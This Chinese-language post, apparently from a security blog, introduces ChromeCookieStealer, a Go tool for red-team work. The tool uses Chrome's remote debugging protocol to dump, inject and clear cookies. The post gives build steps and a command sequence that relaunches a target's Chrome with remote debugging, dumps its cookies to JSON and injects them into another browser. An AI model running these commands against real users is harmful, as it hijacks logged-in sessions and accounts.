如何使用ChromeCookieStealer通过开发者工具收集和注入Chrome Cookie
007bug2023-12-08 18:25:34
关于ChromeCookieStealer
ChromeCookieStealer是一款功能强大的Cookie数据收集和注入工具,该工具需要配合Chrome使用,能够利用Chrome的远程DevTools(开发者工具)协议实现浏览器Cookie的数据收集、注入、清理和删除操作。
该工具支持使用Chrome自己的格式并以JSON对象形式转储Cookie数据,Cookie数据的加载和注入同样使用的是这类数据格式。
该工具仅供安全研究和测试使用,请勿将其用于其他目的。
功能介绍
1、转储Chrome浏览器的Cookie数据;
2、将转储的Cookie数据注入到其他Chrome实例中;
3、清理Chrome的Cookie数据;
4、编译过程中支持自定义设置;
工具下载
由于该工具基于Go语言开发,因此我们首先需要在本地设备上安装并配置好Go语言环境。
接下来,广大研究人员可以使用下列命令将该项目源码克隆至本地:
git clone https://github.com/magisterquis/chromecookiestealer.git
然后切换到项目目录中,使用go build命令构建项目源码:
cd chromecookiestealer go build
工具快速使用
构建完成后,执行下列命令即可收集目标用户Chrome浏览器中的Cookie数据:
pkill Chrome /Applications/Google\ Chrome.app/Contents/MacOS/Google\ Chrome --remote-debugging-port=9222 --restore-last-session # 需要根据目标情况修改 ./chromecookiestealer -dump ./cookies.json
下列命令可以将转储的Cookie数据注入到研究人员的本地浏览器中:
# 使用一个调试端口启动Chrome,具体可参考上面的命令 ./chromecookiestealer -clear -inject ./cookies.json
工具帮助信息
Usage: chromecookiestealer [options] Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port) and, in order and as requested: - Dumps cookies - Clears cookies - Injects cookies - Deletes selected cookies Parameters for cookies to be deleted should be represented as an array of JSON objects with the following string fields: name - 要删除的Cookie名称 url - 删除跟指定域名或URL匹配的所有Cookie domain - 仅删除指定域名的Cookie path - 仅删除指定路径的Cookie Filenames may also be "-" for stdin/stdout. Options: -chrome URL Chrome远程调试URL (默认为"ws://127.0.0.1:9222") -clear 清理浏览器Cookie -delete file 包含要删除Cookie参数的文件名称 -dump file 转储Cookie的文件名称 -inject file 需要注入的包含Cookie的文件名称 -no-summary 退出时不打印概述信息 -verbose 启用Verbose日志
其他编译选项
一般情况下,go build命令足够满足绝大部分用户的需求。如果你需要执行更有针对性的安全测试,可以在编译过程中使用“-ldflags '-X main.Foo=bar'”选项实现自定义配置。
变量 | 描述 |
DumpFile | 转储Cookie的文件名称,在-dump中设置 |
InjectFile | 需要注入的文件名称,在-inject中设置 |
DeleteFile | 描述需要删除Cookie的文件名称,在-delete中设置 |
DoClear | 是否需要清理Cookie,在-clear中设置 |
需要注意的是,上述所有的选项/变量默认都是未设置的。
许可证协议
本项目的开发与发布遵循BSD-3-Clause开源许可证协议。
项目地址
ChromeCookieStealer:https://github.com/magisterquis/chromecookiestealer"
参考资料
https://github.com/slyd0g/WhiteChocolateMacademiaNut
https://chromedevtools.github.io/devtools-protocol/tot/Network/#type-Cookie
007bug
暂无描述